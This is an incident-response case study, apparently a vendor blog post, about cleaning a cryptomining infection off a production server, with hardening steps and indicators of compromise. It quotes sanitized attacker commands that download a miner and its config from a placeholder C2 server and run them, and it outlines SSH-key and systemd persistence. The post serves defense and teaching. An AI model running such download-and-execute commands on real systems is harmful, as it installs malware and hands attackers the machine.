When Crypto Miners Hijack Your Server
Enterprise TechnologyJanuary 31, 20268 min read

When Crypto Miners Hijack Your Server

A production server was silently mining cryptocurrency for attackers. Here's how we detected it, cleaned it up, and made sure it never happens again.

Security AuditIncident ResponseServer Hardening

The Silent Thief

Imagine your electricity bill doubles, your servers run hot, and your applications slow to a crawl — but everything looks normal. That's the insidious nature of cryptojacking: attackers hijack your computing resources to mine cryptocurrency, and you pay for it.

This is the story of how we discovered a sophisticated mining operation running on a client's production server, and the lessons we learned along the way.

Server infrastructure


Something's Not Right

During a routine security check, we ran a basic process analysis:

ps aux --sort=-%cpu | head -10

The output revealed something alarming: a process with a random 8-character name was consuming over 300% CPU — utilizing multiple cores simultaneously. For a server that should be mostly idle between requests, this was a massive red flag.

We dug deeper with netstat and ss to examine network connections:

ss -tupn | grep ESTABLISHED

The process was maintaining active connections to known cryptocurrency mining pools on ports commonly used for Stratum protocol (3333, 4444, 5555). It was also phoning home to a command-and-control server for configuration updates.


What is a C2 Server?

Before diving deeper, let's explain a key concept: Command and Control (C2) servers.

A C2 server is the attacker's remote headquarters. It's a server they control that:

  • Distributes malware — Infected machines download payloads from here
  • Sends instructions — Tells malware what to do, when to update, which pools to mine
  • Receives data — Collects information from compromised systems
  • Maintains control — Even if you kill the malware, it can re-download and restart

Think of it like a puppet master pulling strings. The malware on your server is just a puppet — the real brain is the C2 server giving it orders.


The Attack Flow

Here's how the attack unfolded, including how it survived our first cleanup attempt:

Phase 1: Initial Compromise

Step 1 — Attacker adds SSH key to authorized_keys
(via exposed management interface or compromised credentials)

Step 2 — SSH into server with persistent, password-less access

Phase 2: Infection

Step 3 — Download miner binary from C2 server

curl http://[C2-SERVER]:4082/worker -o /tmp/.w

Step 4 — Create hidden systemd service in ~/.config/systemd/user/
(base64-encoded payload to avoid detection)

Step 5 — Deploy watchdog script that:

  • Monitors miner process every 60 seconds
  • Kills competing miners
  • Restarts miner if killed

Step 6 — Start mining Monero (XMR), connect to pools

Step 7 — Notify attacker via Telegram bot: "New host infected"

Phase 3: First Cleanup Attempt (Failed)

What we did:

  • Noticed high CPU usage
  • Killed suspicious process with pkill

What happened next:

  • Watchdog detected miner death within 60 seconds
  • Watchdog contacted C2 server
  • Downloaded fresh miner copy
  • Restarted with a new random process name
  • Mining resumed as if nothing happened

Phase 4: Successful Cleanup

Step 1 — Block C2 server at firewall (cut the puppet strings)

Step 2 — Remove unauthorized SSH keys (lock the door)

Step 3 — Kill watchdog + miner processes

Step 4 — Delete systemd persistence service

Step 5 — Rebuild container from clean image (scorched earth)

Step 6 — Block mining ports, enable monitoring, harden SSH

Why the First Cleanup Failed

The key insight: killing the miner process isn't enough.

The attack has multiple layers of persistence:

  1. SSH key — Attacker can log back in anytime
  2. Systemd service — Restarts miner on reboot
  3. Watchdog script — Restarts miner if killed
  4. C2 connection — Downloads fresh malware if files deleted

If you only kill the process, the watchdog brings it back. If you delete the files, the C2 re-downloads them. If you do both, the systemd service restarts everything on reboot. And even if you clear all of that, the SSH key lets the attacker manually reinstall everything.

You have to break all the links simultaneously:

  1. Block C2 (prevent re-download)
  2. Remove SSH keys (prevent re-entry)
  3. Kill all malicious processes
  4. Delete all persistence mechanisms
  5. Rebuild from clean state (eliminate unknowns)

Anatomy of the Attack

The Persistence Mechanism

The attackers had created a systemd user service hidden in a dot-directory:

~/.config/systemd/user/.hidden-service

The service file contained a base64-encoded payload. When decoded, it revealed a script that:

  1. Downloads the mining binary from the C2 server
  2. Fetches configuration (wallet addresses, pool URLs)
  3. Creates a watchdog script to kill competing miners
  4. Sends a Telegram notification upon successful infection
# Decoded payload structure (sanitized)
curl -s http://[C2-SERVER]/worker -o /tmp/.w
curl -s http://[C2-SERVER]/conf -o /tmp/.c
chmod +x /tmp/.w && /tmp/.w -c /tmp/.c &

How They Got In

Examining /root/.ssh/authorized_keys and user home directories revealed an unauthorized SSH key. This gave the attackers persistent, password-less access.

The key likely came from:

  • A compromised developer machine
  • An exposed container management interface
  • A previous undetected breach

Cybersecurity analysis


The Cleanup

Phase 1: Document Everything

Before touching anything, we captured the current state:

# Snapshot running processes
ps auxf > /evidence/processes.txt

# Network connections
ss -tupna > /evidence/network.txt

# Cron jobs and systemd services
crontab -l > /evidence/cron.txt
systemctl list-units --type=service > /evidence/services.txt

Phase 2: Rebuild, Don't Patch

Rather than trying to surgically remove the malware, we took the safer approach: complete container rebuild.

# Scale down the infected service
docker service scale srv-infected=0

# Remove all cached layers and artifacts
docker system prune -af

# Rebuild from clean base image
docker service update --force srv-infected

This eliminates any hidden persistence mechanisms we might have missed.

Phase 3: Verify Clean State

After rebuild, we confirmed the infection was gone:

# Check for suspicious processes
ps aux | grep -E '[0-9a-zA-Z]{8}$'

# Verify no mining pool connections
netstat -tupn | grep -E ':(3333|4444|5555|7777|9999)'

# Check container resource usage
docker stats --no-stream

All containers returned to normal CPU usage (under 1%).


Hardening: Defense in Depth

SSH Configuration

We hardened /etc/ssh/sshd_config:

# Disable root login entirely
PermitRootLogin no

# Limit authentication attempts
MaxAuthTries 3

# Reduce login grace period
LoginGraceTime 60

# Disable password auth (key-only)
PasswordAuthentication no

Intrusion Prevention with fail2ban

We configured aggressive banning for SSH brute force attempts:

# /etc/fail2ban/jail.local
[sshd]
enabled = true
maxretry = 3
bantime = 86400    # 24 hours
findtime = 600     # 10 minute window

Firewall Rules

We blocked known mining infrastructure at the network level:

# Block C2 server
iptables -A OUTPUT -d [C2-IP] -j DROP

# Block common mining ports (applied to Docker containers too)
for port in 3333 4444 5555 7777 9999 14444 45700; do
    iptables -A DOCKER-USER -p tcp --dport $port -j DROP
done

# Persist rules across reboots
netfilter-persistent save

Monitoring

We set up alerts for anomalous behavior:

# Alert if any container exceeds 200% CPU for 5+ minutes
# (Configured in Netdata/Prometheus/your monitoring tool)

Security implementation


Indicators of Compromise (IOCs)

For reference, here's what to look for:

Process Indicators:

  • Random alphanumeric process names (8+ characters)
  • Processes consuming >100% CPU consistently
  • Parent processes spawning from /tmp, /dev/shm, or hidden directories

Network Indicators:

  • Outbound connections to ports 3333, 4444, 5555, 7777, 9999, 14444
  • DNS queries to known mining pool domains (kryptex, unmineable, nanopool, etc.)
  • Connections to Eastern European hosting providers (common for C2)

File System Indicators:

  • Hidden files in /tmp, /var/tmp, /dev/shm
  • Unauthorized SSH keys
  • Systemd services in user directories with encoded content

Lessons Learned

1. SSH Keys Are Powerful — Treat Them That Way

An SSH key is essentially a permanent password. Rotate them regularly, audit who has access, and remove keys immediately when team members leave.

2. Containers Need Security Too

Running applications in containers provides isolation, but the host system, orchestration platform, and containers themselves all need security attention. Don't assume containerization equals security.

3. Monitor What "Normal" Looks Like

If you don't know your baseline CPU usage, you won't notice when it triples. Establish baselines and alert on deviations.

4. Defense in Depth Works

No single security measure is foolproof. Layering access controls, intrusion prevention, network restrictions, and monitoring creates multiple opportunities to catch attackers.


Quick Security Checklist

Is your server protected?

  • Root SSH login disabled?
  • SSH key-only authentication enabled?
  • fail2ban or similar IPS running?
  • Outbound connections to mining ports blocked?
  • CPU monitoring with alerts configured?
  • Regular security audits scheduled?

If you answered "no" to any of these, you might be an easy target.


This case study is based on a real incident. Specific identifiers have been sanitized to protect client confidentiality.

Need similar solutions?

Let's discuss how we can help with your project.

Schedule a Call